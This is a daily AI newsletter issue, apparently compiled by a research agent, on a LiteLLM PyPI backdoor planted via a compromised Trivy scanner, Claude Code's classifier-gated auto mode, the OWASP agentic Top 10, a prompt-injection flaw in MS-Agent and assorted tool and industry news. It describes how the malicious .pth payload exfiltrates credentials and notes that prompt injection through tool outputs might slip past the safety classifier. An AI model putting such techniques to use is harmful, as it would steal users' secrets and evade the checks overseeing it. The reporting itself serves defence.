MindPattern
Back to archive

Ramsay Research Agent — March 24, 2026

[2026-03-24] -- 4,182 words -- 21 min read

Ramsay Research Agent — March 24, 2026

Top 5 Stories Today

1. LiteLLM Got Backdoored. The Attack Vector? Their Own Security Scanner.

Every Python process on your machine just became a potential credential exfiltration endpoint if you installed the wrong version of LiteLLM today.

LiteLLM versions 1.82.7 and 1.82.8, published to PyPI on March 24, contained a malicious .pth file that executes automatically on every Python startup. Not on import. On startup. The payload dumps environment variables, queries cloud metadata endpoints (IMDS for AWS/GCP/Azure), and exfiltrates SSH keys, cloud credentials, Kubernetes configs, and crypto wallets encrypted with AES-256-CBC to a lookalike domain. LiteLLM gets 3.4 million downloads per day. 97 million monthly. The malicious versions were live for approximately three hours before PyPI quarantined them.

Here's what caught me off guard: the attack didn't start with LiteLLM. Threat actor TeamPCP first compromised Aqua Security's Trivy GitHub Action on March 19. Trivy. The vulnerability scanner. They compromised the tool that's supposed to catch this exact kind of thing, then used the CI/CD credentials it had access to in LiteLLM's pipeline to publish the poisoned packages directly to PyPI. They also hit Checkmarx and KICS GitHub Actions. Five days from scanner compromise to package backdoor.

This is a new pattern and it's ugly. Compromising a security scanner gives you access to everything it scans. It's the supply chain attack equivalent of stealing a master key from the locksmith. Your security tooling is now an attack surface, not just a defense layer.

The actionable response is already shipping across the package manager ecosystem. Simon Willison documented the cooldown features now production-ready: pnpm minimumReleaseAge (v10.16), Yarn npmMinimalAgeGate (v4.10), npm min-release-age (v11.10), and Bun's equivalent. A conservative 60-day setting would have completely blocked this attack. The malicious versions existed for 3 hours. Even a 24-hour cooldown would have saved you. Set this in your lockfile config today. Not tomorrow. Right now. If you're running LiteLLM in production, audit your CI/CD pipeline for Trivy GitHub Actions and check whether versions 1.82.7 or 1.82.8 ever touched your environment.

2. Claude Code Auto Mode Kills the Permission Fatigue Problem

If you've used Claude Code for any serious session, you know the drill. Approve. Approve. Approve. Approve. You stop reading the prompts after the fifteenth one. That's the worst possible security outcome, way worse than a well-designed automated check.

Anthropic launched auto mode today, and it's the first permission model for coding agents that actually makes sense. A Sonnet 4.6 classifier reviews every single tool call before execution, blocking destructive actions (mass file deletion, data exfiltration, malicious code execution) while letting safe operations proceed without interruption. It sits between the conservative default permissions and the terrifying --dangerously-skip-permissions flag that I've seen way too many people casually recommend on Reddit.

Simon Willison's analysis breaks down the architecture in detail. The classifier-as-guardrail pattern is the key insight here. You've got a fast, cheap model (Sonnet 4.6) gating every action by a more capable, expensive model (Opus 4.6). The fast model isn't doing the work. It's reviewing the work for safety. This is the same dual-model pattern that's been emerging in production agent systems for months, but Anthropic is the first to ship it as a first-party feature in a coding tool.

The r/ClaudeAI community response was telling. 308 upvotes, 129 comments, and the comment ratio (0.42) was the highest of any Claude Code post today. People are genuinely debating whether classifier reliability is sufficient, whether adversarial prompt injection through tool outputs could bypass it, and whether normalizing reduced human oversight creates a ratchet effect. These are the right questions.

Enable it if you're on Teams plan: claude --enable-auto-mode or Settings > Claude Code > permission mode in VS Code. It adds slight latency and token overhead from the classifier pass. My recommendation: use it in isolated environments (containers, worktrees) for long-running tasks where permission fatigue is a real risk. This pattern will spread. Cursor, Codex, and Windsurf all face the same UX friction. Expect copycat implementations within weeks.

3. Anthropic Published How They Actually Build With Claude Code. It's Two Agents, Not One.

The most useful engineering blog post I've read this year dropped today with zero fanfare.

Anthropic's engineering team published the actual architecture they use for long-running autonomous coding: a two-agent harness where an initializer agent sets up the project environment (init scripts, feature lists, progress logs) and a coding agent works incrementally across multiple context windows. The memory bridge between them? A plain text file called claude-progress.txt. Not a vector database. Not a knowledge graph. A text file.

The specifics are what make this valuable. They expand prompts into 200+ discrete end-to-end features tracked in a JSON structure. Each feature has a defined scope, acceptance criteria, and verification method. Puppeteer-based browser testing runs automatically to verify UI features. The coding agent reads the progress file at the start of each context window, picks up where the previous session left off, and updates the file when done. It's embarrassingly simple and that's exactly why it works.

This post generated 3,460 likes and 435K views. That engagement isn't because people found it interesting. It's because people found it useful. I've already started adapting the pattern for my own projects. The progress file approach solves the most painful problem with long-running agent sessions: context loss between windows. I've been doing something similar with CLAUDE.md files, but the structured JSON feature tracking is a level up.

The broader signal: "harness engineering" is becoming a real discipline. The agent itself is a commodity. The harness around it, the scaffolding that manages context, tracks progress, verifies outputs, that's where the craft is. If you're building anything with autonomous coding agents, read this post and steal the architecture. It's production-tested by the team that built the model.

4. A Local Knowledge Graph Just Cut My Claude Code Token Bill by 49x

This is the install-this-today story.

code-review-graph (3.5K GitHub stars) builds a persistent AST-based knowledge graph of your codebase using Tree-sitter, then queries it at review time to compute the minimal context set Claude actually needs. On a 27,732-file Next.js monorepo, it reduced review context from 739,000 tokens to approximately 15,000. That's a 49x reduction. Not a typo.

The counterintuitive part: review quality went up, not down. The tool scored 8.8 on a ten-point quality scale versus 7.2 for full-context reviews. Less noise means better signal. Claude isn't sifting through thousands of irrelevant files to find the three that matter. The knowledge graph already knows the dependency chain, the call graph, and the file relationships. It hands Claude exactly what it needs and nothing else.

It ships as a Claude Code plugin with incremental updates on git commits. Zero workflow change required. Your knowledge graph stays current as you work. At current Opus 4.6 pricing, going from 739K to 15K tokens per review on a large repo is the difference between "I need to think about whether this review is worth the cost" and "I don't even notice the cost."

I'm installing this on my largest project today. If you're running Claude Code on anything bigger than a toy repo, the ROI is immediate. The combination of this tool with the Anthropic compaction API (compact-2026-01-12) could make context management a solved problem for most codebases. We're not there yet, but the pieces are falling into place.

5. OWASP Just Shipped the Security Checklist Every Agent Team Needs

The first canonical security framework for agentic applications is here, and the timing couldn't be better.

OWASP released the Top 10 for Agentic Applications 2026, developed with over 100 security experts. ASI01 Agent Goal Hijacking leads the list, and if you've been following today's other stories, you already know why. Attackers manipulate agent objectives through poisoned inputs because agents can't reliably distinguish instructions from data. The LiteLLM attack (story #1) is a textbook case of ASI02 Tool Misuse & Exploitation. Claude Code's auto mode classifier (story #2) is specifically designed to guard against ASI01.

A Dark Reading poll shows 48% of security professionals now rank agentic AI as the #1 attack vector for 2026. That's higher than deepfakes. Higher than ransomware. The full list covers Identity & Privilege Abuse (ASI03), Excessive Autonomy (ASI04), Improper Output Handling (ASI05), and all the way to Rogue Agents (ASI10), which is the nightmare scenario where an agent starts operating outside its intended parameters with no human in the loop.

What makes this different from yet another security framework: it's specific to agents, not LLMs generally. The threat model accounts for tool use, multi-step reasoning, autonomous decision-making, and inter-agent communication. These are fundamentally different attack surfaces than prompt injection against a chatbot.

If you're shipping agents to production, print this list and tape it to your monitor. Map each of your agents against all ten categories. The uncomfortable reality is that most teams I've talked to are addressing maybe two or three of these. The other seven are open attack surfaces they haven't thought about.

Section Deep Dives

Security

UK government finds a scaling law for AI cyberattacks. Import AI 450 reports that at a fixed 10M token budget on a corporate network range, average attack steps completed rose from 1.7 (GPT-4o, August 2024) to 9.8 (Opus 4.6, February 2026). Nearly 6x improvement in autonomous offensive capability in 18 months. Best single runs completed 22 of 32 attack steps in 6 hours versus 14 hours for human experts. Defensive infrastructure needs to plan for AI-augmented adversaries as a near-term certainty, not a hypothetical.

MS-Agent CVE-2026-2256: prompt injection to full system compromise. SecurityWeek reported that Alibaba's MS-Agent framework allows attackers to achieve arbitrary OS command execution through prompt injection that triggers unsanitized shell execution. The regex-based command blacklist is trivially bypassed. CERT/CC confirmed no vendor patch exists. If you're using MS-Agent with any untrusted inputs, documents, logs, or research data, you're exposed.

Security audit of 22,511 AI agent skills found 140,963 issues. The New Stack uncovered a gap between what package registries scan and what actually runs on developer machines. Skills execute with agent-level permissions and often bypass conventional security scanning entirely. The agent skill ecosystem has a fundamentally different threat model than npm packages, and we don't have the tooling to match.

Self-propagating malware targets open-source packages, wipes Iranian machines. Ars Technica reports on malware that compromises legitimate packages and specifically destroys data on machines with Iranian locale settings. Combined with the LiteLLM/TeamPCP campaign, March 2026 is shaping up as the worst month for open-source supply chain attacks on record.

Agents

Oracle ships 22 Fusion Agentic Applications. Oracle launched coordinated AI agent teams inside Fusion Cloud spanning HCM, ERP, SCM, and CX. The no-code Agentic Applications Builder and workflow orchestration ship at no additional cost to existing Fusion customers with 63,000 certified experts. Oracle embedding agents into ERP at zero incremental cost puts pressure on every standalone SaaS vendor charging separately for AI features.

Dapr Agents v1.0 goes GA at KubeCon Europe. CNCF announced the general availability of Dapr Agents, providing durable workflows and state management that survives process deaths, node restarts, and network drops. ZEISS Vision Care presented a production deployment. If you need agent durability guarantees in Kubernetes, this is the first CNCF-blessed option.

Code review agents solve only ~40% of real review tasks. c-CRAB, a new benchmark from NUS, tested PR-agent, Devin, Claude Code, and Codex on actual human pull request reviews. The ~40% solve rate reveals a hidden trade-off between issue resolution and spurious findings. We're not close to automated code review replacing humans. Not yet.

Cisco ships DefenseClaw for agent security. Cisco's RSA 2026 announcement includes Skills Scanner, MCP Scanner, AI BoM, and Zero Trust Access for AI agents via Duo IAM with MCP policy enforcement. Their survey found 85% of enterprises experiment with agents but only 5% reach production. That gap is a security problem.

Mozilla AI launches CQ: Stack Overflow for agents. CQ is an open-source knowledge commons where coding agents query past learnings before tackling unfamiliar work. One user consumed 170M tokens in 2 days (~$1,700) re-solving known problems. The HN discussion immediately raised poison-pill attack concerns, and they're right to worry. Same day StackOverflow reported a 99% decline in daily questions. The knowledge function is migrating from human Q&A to agent commons.

Research

GPT-5.4 Pro solved a FrontierMath open problem. Sort of. Epoch AI confirmed GPT-5.4 Pro scored 50% on FrontierMath Tiers 1-3 and 38% on Tier 4. But the model appears to have found a 2011 preprint that shortcut the intended work, raising questions about genuine mathematical reasoning versus sophisticated retrieval. The 422-point, 615-comment HN thread was the most intensely debated AI story of the day.

Factory AI's anchored iterative summarization beats OpenAI and Anthropic on context compression. Factory scored 4.04 accuracy versus Anthropic's 3.74 and OpenAI's 3.43 across 36,000 production session messages. The key insight: structured persistent summaries with explicit sections for intent, modifications, decisions, and next steps force preservation. Structure acts as a checklist preventing silent information loss.

METR study: experienced developers 19% slower with AI tools. Time saved on code generation was offset by review, debug, and correction overhead. A separate analysis found AI co-authored code contained 1.7x more major issues and 2.74x higher security vulnerability rates. For experienced developers, AI tools deliver gains primarily on boilerplate, not complex logic. Calibrate accordingly.

50 researchers drop a 303-page field guide on code intelligence. Researchers from ByteDance, Alibaba, and Tencent published a practical guide covering the complete lifecycle of code LLMs. 925 likes, 83K views. The poster noted "the takeaways are not what most people think," suggesting contrarian findings about agent capabilities versus expectations.

Infrastructure & Architecture

ARM ships its own silicon for the first time in 35 years. The AGI CPU: 136 Neoverse V3 cores at 3.7GHz on TSMC 3nm, 300W TDP, 12-channel DDR5-8800, PCIe Gen 6, CXL 3.0. Meta is the lead customer. Seven others including OpenAI, Cloudflare, and SAP. ARM going from IP licensor to silicon vendor is a massive strategic shift. This is the CPU-side orchestration layer for coordinating GPU accelerators in large-scale agent deployments.

Cloudflare Dynamic Workers: 100x faster than containers for agent sandboxing. Dynamic Workers let one Worker spin up another Worker at runtime with AI-generated code, execute it in an isolate, and discard it immediately. Millisecond startup, a few MB of memory. Available to all paid Workers users in open beta. If you need to sandbox untrusted agent code, this is the cheapest and fastest option available right now.

NVIDIA donates GPU DRA driver to Kubernetes community. NVIDIA's KubeCon announcement moves Dynamic Resource Allocation from proprietary to open source. Fine-grained GPU scheduling and sharing across containerized AI workloads becomes a community-owned primitive. About time.

Gimlet Labs raises $80M for cross-chip AI inference. Gimlet runs inference simultaneously across NVIDIA, AMD, Intel, ARM, Cerebras, and d-Matrix chips. If GPU lock-in is your concern, this is the company trying to solve it.

Tools & Developer Experience

Google Workspace gets an official CLI with built-in MCP server. googleworkspace/cli (22.4K stars) is a Rust CLI that dynamically builds its command surface from Google's Discovery Service. Ships a built-in MCP server via npm so any MCP-compatible agent can access Drive, Gmail, Calendar, Sheets, Docs, and Chat. 100+ Agent Skills as SKILL.md files. Hit 10K+ stars in its first week.

Agent Flow visualizes Claude Code's black box in real time. Agent Flow (235 upvotes on r/ClaudeAI) shows how Claude branches decisions, backtracks, and recovers from errors. Auto-configures Claude Code hooks on first launch. If you've ever wondered what Claude Code is actually doing during a long task, install this.

Anthropic Dispatch: text tasks from iPhone, return to finished work on Mac. Dispatch pairs an iPhone with a Mac via QR code, letting you text Claude task instructions from anywhere. Combined with Computer Use, this creates a remote task pipeline for Pro and Max subscribers. I'm still testing how well this works in practice.

Models

GigaChat 3.1 Ultra: 702B MoE under MIT license. Sber released GigaChat-3.1-Ultra-702B (36B active params) with native FP8 training, not post-hoc quantization. Multi-head Latent Attention for compressed KV cache, Multi-Token Prediction for up to 40% faster inference. First serious Russian open-weights competitor at the 702B scale.

OpenAI finishes pretraining 'Spud.' The Information reports Altman told staff the model "can really accelerate the economy." No benchmarks or timeline yet. GPT-5.4 shipped March 5, making this an unusually fast successor cycle. Also: OpenAI's product deployment team was renamed "AGI Deployment." Make of that what you will.

Gemini 3.1 Pro tops SWE-bench but practitioners aren't buying it. 77.1% on ARC-AGI-2, 2887 Elo on LiveCodeBench Pro, 94.3% on GPQA Diamond. But r/singularity users report it's "nowhere near as reliable as Claude Opus 4.6 or GPT 5.4 for real-world coding." AI Explained (107K views) calls this "the downfall of benchmarks." I'm inclined to agree. When the leaderboard winner isn't the tool practitioners choose, the leaderboard is broken.

iPhone 17 Pro runs a 400B parameter model on-device. Developer @anemll demonstrated Qwen3.5-397B-A17B via Flash-MoE SSD-to-GPU streaming. 0.6 tokens/second. Impractical for daily use. Fascinating as a proof of concept that mobile hardware can run frontier-scale models.

Vibe Coding

Claude Computer Use launches on macOS. Anthropic released Computer Use as a research preview for Pro and Max subscribers. Claude can click, scroll, navigate apps, fill spreadsheets, and control the full desktop. 68M views on the announcement tweet. 133K likes. The safety model requires app-level consent, and Pro usage limits are reportedly draining in minutes from the token consumption.

Google AI Studio goes full-stack with Firebase integration. The Antigravity coding agent now auto-detects when an app needs a database or auth and provisions Cloud Firestore and Firebase Authentication inline. Firebase Studio is being sunset (accessible until March 2027). Google is consolidating everything into AI Studio as its primary AI-first IDE.

Karpathy hasn't typed code since December. On No Priors, he revealed AI agents now produce 100% of his code. He built "Dobby the House Elf," a WhatsApp-controlled agent unifying his entire smart home through natural language. He described experiencing "claw psychosis" while running 20 parallel agents.

Salesforce hired zero engineers in FY2026. Benioff confirmed a 30%+ productivity increase from AI coding agents. Agentforce grew to $800M. Sales team grew by 20%. The structural workforce shift from engineering to revenue roles is happening at enterprise scale, not just in solo builder shops.

Apple blocks vibe-coded app updates on App Store. MacRumors reports Replit and Vibecode were forced to remove preview features. Apple's own Xcode now integrates OpenAI and Anthropic agentic coding tools. Gatekeeper vibes.

Hot Projects & OSS

ByteDance DeerFlow hits 43.7K stars (+4,346 today). DeerFlow is a SuperAgent harness on LangGraph that spawns parallel sub-agents with scoped context and isolated Docker containers. #1 trending on GitHub.

Project N.O.M.A.D: 15.4K stars for an offline AI survival computer. Self-contained Docker system with local AI via Ollama, offline Wikipedia, Khan Academy, and maps. Requires 32GB RAM and 1TB SSD. Fastest-growing non-agent repo on GitHub.

supermemory: 18.6K stars for the memory API agents need. Universal memory and context layer with plugins for Claude Code, OpenCode, and OpenClaw. Claims #1 on LongMemEval (~99%). Free tier includes 1M tokens/month.

Agent-Reach: 10.6K stars for giving agents internet eyes. Pip-installable tool providing structured search across Twitter, Reddit, YouTube, and GitHub with zero API fees. Cookie-based Twitter auth with no rate limits.

SaaS Disruption

$50B+ deployed to boom-era software companies that haven't raised in 4+ years. Crunchbase analysis reveals a massive cohort of zombie SaaS unicorns facing AI-native competitors from below and impossible IPO economics from above. This capital overhang may never generate returns.

Capital flows to AI infrastructure while application-layer SaaS starves. In a single week: $3.5B (Kleiner Perkins) + $500M (Nexthop AI) + $400M (Replit) + $200M (Axiom Math) = $4.6B+ into AI infrastructure. Meanwhile Salesforce stock is down 30% YTD and Adobe is down 27%.

SaaStr warns: agent drift is the new silent churn. One of their ~30 deployed agents silently degraded, making decisions on stale CRM data. Nobody noticed. Each agent now requires daily monitoring. Agent management consumes 30% of their Chief AI Officer's time.

Policy & Governance

China releases MERLIN, a military electronic warfare AI model. Import AI 450 reports MERLIN outperforms GPT-5, Claude-4-Sonnet, and DeepSeek on electronic warfare reasoning tasks by wide margins. Trained on EM-100K dataset for low-signal-to-noise environments. Open publication from researchers with military affiliations.

Jensen Huang declares "I think we've achieved AGI." On Lex Fridman's podcast, using a definition where an AI can create a billion-dollar business. Satya Nadella countered we're "not anywhere close." Mark Gubrud, who originally coined the AGI acronym, also said current systems match his original vision. The term has become a marketing battleground more than a technical one.

"Is anybody else bored of talking about AI?" hits 560 points on HN. Combined with "So where are all the AI apps?" (382 points) and "The AI industry is lying to you" (146 points), a strong counter-narrative cluster formed today. When the builder audience starts actively pushing back on saturation, the hype cycle may be peaking. I don't think the technology is peaking. The conversation is.

Snowflake eliminates entire 70-person technical writing team. Replaced by "Project SnowWork," an autonomous platform built on their $200M OpenAI partnership. The most concrete enterprise AI displacement event to date. An entire professional discipline, gone.

Skills of the Day

  1. Set package manager cooldown to 60 days today. pnpm: minimumReleaseAge: "60d" in .npmrc. npm 11.10+: min-release-age=60d. Yarn 4.10+: npmMinimalAgeGate: "60d". This single config change would have blocked both the LiteLLM and Shai-Hulud supply chain attacks.

  2. Install code-review-graph as a Claude Code plugin for 49x token savings. Run claude install code-review-graph, let it build the AST knowledge graph on your repo, and every subsequent code review uses the minimal context set. On large repos, this drops review costs from dollars to pennies.

  3. Use the two-agent harness pattern with a progress file for long-running Claude Code sessions. Create a claude-progress.txt in your project root. Have your init prompt enumerate features as a JSON array. Start each new session by reading the progress file. Update it at the end. Simple, effective, production-tested by Anthropic's own team.

  4. Run /context periodically during long Claude Code sessions to identify token-hungry tools. The command flags memory bloat, identifies which tools consume the most context, and suggests specific optimization steps. Better to prune proactively than to hit degraded output quality.

  5. Audit your CI/CD security scanners as attack surfaces, not just defense tools. After TeamPCP's Trivy compromise, treat every GitHub Action with CI/CD credentials as a potential lateral movement vector. Pin action versions to commit SHAs, not tags. Review what credentials each action can access.

  6. Map your agent deployments against OWASP's Top 10 for Agentic Applications. Print the ASI01-ASI10 list. For each agent you ship, check which risks apply. Most teams I've talked to cover 2-3 of the 10. The other 7 are open attack surfaces.

  7. Use ACON's failure-driven guideline optimization for agent context compression. The ICLR paper shows 26-54% token reduction with 95%+ accuracy preserved, and it works with closed-source models. Analyze where compressed context fails and update compression guidelines in natural language.

  8. Try Claude Code's /batch command for independent parallel changes. It handles worktree isolation automatically. No manual git worktree setup needed. Use it for competing debug hypotheses or simultaneous frontend/backend/test changes.

  9. Deploy Firecracker microVMs for untrusted agent code execution. ~125ms boot time, <5MiB memory overhead, dedicated kernel per workload. Default to microVMs for untrusted code. Only relax to gVisor or hardened containers when your threat model justifies it.

  10. Add intent-aware routing to your RAG pipeline. Classify queries as factual (route to fast model + vector retrieval), procedural (route to step-by-step reasoning), or open-ended (route to capable model + web search). This reduces costs by 60-80% on simple lookups while reserving expensive inference for complex reasoning.

Like what you're reading? Have feedback? Reply directly to this email or find me on Bluesky @webdevdad. If this newsletter helped you catch something important or ship something better, I'd love to hear about it.

How This Newsletter Learns From You

This newsletter has been shaped by 10 pieces of feedback so far. Every reply you send adjusts what I research next.

Your current preferences (from your feedback):

  • More builder tools (weight: +2.5)
  • More agent security (weight: +2.0)
  • More agent security (weight: +1.5)
  • More vibe coding (weight: +1.5)
  • Less market news (weight: -1.0)
  • Less valuations and funding (weight: -3.0)
  • Less market news (weight: -3.0)

Want to change these? Just reply with what you want more or less of.

Ways to steer this newsletter:

  • "More [topic]" / "Less [topic]" — adjust coverage priorities
  • "Deep dive on [X]" — I'll dedicate extra research to it
  • "[Section] was great" — reinforces that direction
  • "Missed [event/topic]" — I'll add it to my radar
  • Rate sections: "Vibe Coding section: 9/10" helps me calibrate

Reply to this email — I've processed 8/10 replies so far and every one makes tomorrow's issue better.